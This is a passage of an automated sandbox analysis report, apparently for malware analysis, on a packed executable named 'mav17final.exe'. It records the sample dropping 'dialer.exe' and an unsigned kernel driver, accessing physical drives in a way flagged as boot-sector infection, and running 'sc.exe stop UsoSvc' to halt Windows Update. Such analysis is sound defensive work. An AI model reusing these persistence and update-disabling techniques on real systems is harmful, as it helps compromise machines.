      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
      Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
      Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: napinsp.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wshbth.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: nlaapi.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: winrnr.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\dwm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: mav17final.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: mav17final.exeStatic file information: File size 13827522 > 1048576
      Source: mav17final.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: mav17final.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: mav17final.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: mav17final.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: mav17final.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: mav17final.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: mav17final.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: mav17final.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mav17final.exe, 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2072745005.00007FF8B90AC000.00000002.00000001.01000000.0000000B.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2072745005.00007FF8B90AC000.00000002.00000001.01000000.0000000B.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mav17final.exe, 00000000.00000003.1983941024.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mav17final.exe, 00000000.00000003.1983941024.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2073128104.00007FF8B93C8000.00000002.00000001.01000000.00000008.sdmp
      Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: mav17final.exe, 00000002.00000002.2068496795.00007FF8A8CEB000.00000002.00000001.01000000.00000004.sdmp
      Source: mav17final.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: mav17final.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: mav17final.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: mav17final.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: mav17final.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9071270 LoadLibraryA,GetProcAddress,FreeLibrary,2_2_00007FF8B9071270
      Source: mav17final.exeStatic PE information: section name: _RDATA
      Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
      Source: libssl-1_1.dll.0.drStatic PE information: section name: .00cfg
      Source: python311.dll.0.drStatic PE information: section name: PyRuntim
      Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
      Source: dialer.exe.2.drStatic PE information: section name: .00cfg
      Source: dialer.exe.9.drStatic PE information: section name: .00cfg
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA7F018 push rax; retf 0000h0_2_00007FF79EA7F019
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B909D418 push rsi; retf 2_2_00007FF8B909D419
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B909D390 push rsi; iretd 2_2_00007FF8B909D3A5
      Source: C:\Windows\System32\conhost.exeCode function: 64_2_0000000140001394 push qword ptr [0000000140009004h]; ret 64_2_0000000140001403

      Persistence and Installation Behavior

      barindex
      Contains functionality to infect the boot sector
      Source: C:\Users\user\Desktop\mav17final.exeCode function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, \\.\PhysicalDrive%d2_2_00007FF8B9075750
      Source: C:\Users\user\Desktop\mav17final.exeCode function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, PhysicalDrive%i2_2_00007FF8B9075750
      Source: C:\Users\user\Desktop\mav17final.exeCode function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i2_2_00007FF8B9075750
      Source: C:\Users\user\Desktop\mav17final.exeCode function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, DeviceIoControl -> ERROR_NOT_SUPPORTED; ignore PhysicalDrive%i2_2_00007FF8B9075750
      Sample is not signed and drops a device driver
      Source: C:\ProgramData\dialer.exeFile created: C:\Windows\TEMP\ujjtjyeszdwn.sys
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\_hashlib.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\libssl-1_1.dllJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\_decimal.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\_ctypes.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\_ssl.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\_bz2.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\_socket.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\libcrypto-1_1.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeFile created: C:\ProgramData\dialer.exeJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\pyexpat.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\unicodedata.pydJump to dropped file
      Source: C:\ProgramData\dialer.exeFile created: C:\Windows\Temp\ujjtjyeszdwn.sysJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\_lzma.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\dialer.exeJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\select.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\python311.dllJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\VCRUNTIME140.dllJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\libffi-8.dllJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\psutil\_psutil_windows.cp311-win_amd64.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682\_elementtree.pydJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeFile created: C:\ProgramData\dialer.exeJump to dropped file
      Source: C:\ProgramData\dialer.exeFile created: C:\Windows\Temp\ujjtjyeszdwn.sysJump to dropped file

      Boot Survival

      barindex
      Contains functionality to infect the boot sector
      Source: C:\Users\user\Desktop\mav17final.exeCode function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, \\.\PhysicalDrive%d2_2_00007FF8B9075750
      Source: C:\Users\user\Desktop\mav17final.exeCode function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, PhysicalDrive%i2_2_00007FF8B9075750
      Source: C:\Users\user\Desktop\mav17final.exeCode function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i2_2_00007FF8B9075750
      Source: C:\Users\user\Desktop\mav17final.exeCode function: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle, DeviceIoControl -> ERROR_NOT_SUPPORTED; ignore PhysicalDrive%i2_2_00007FF8B9075750
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9078F50 StartServiceA,CloseServiceHandle,CloseServiceHandle,2_2_00007FF8B9078F50
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA450D0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF79EA450D0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
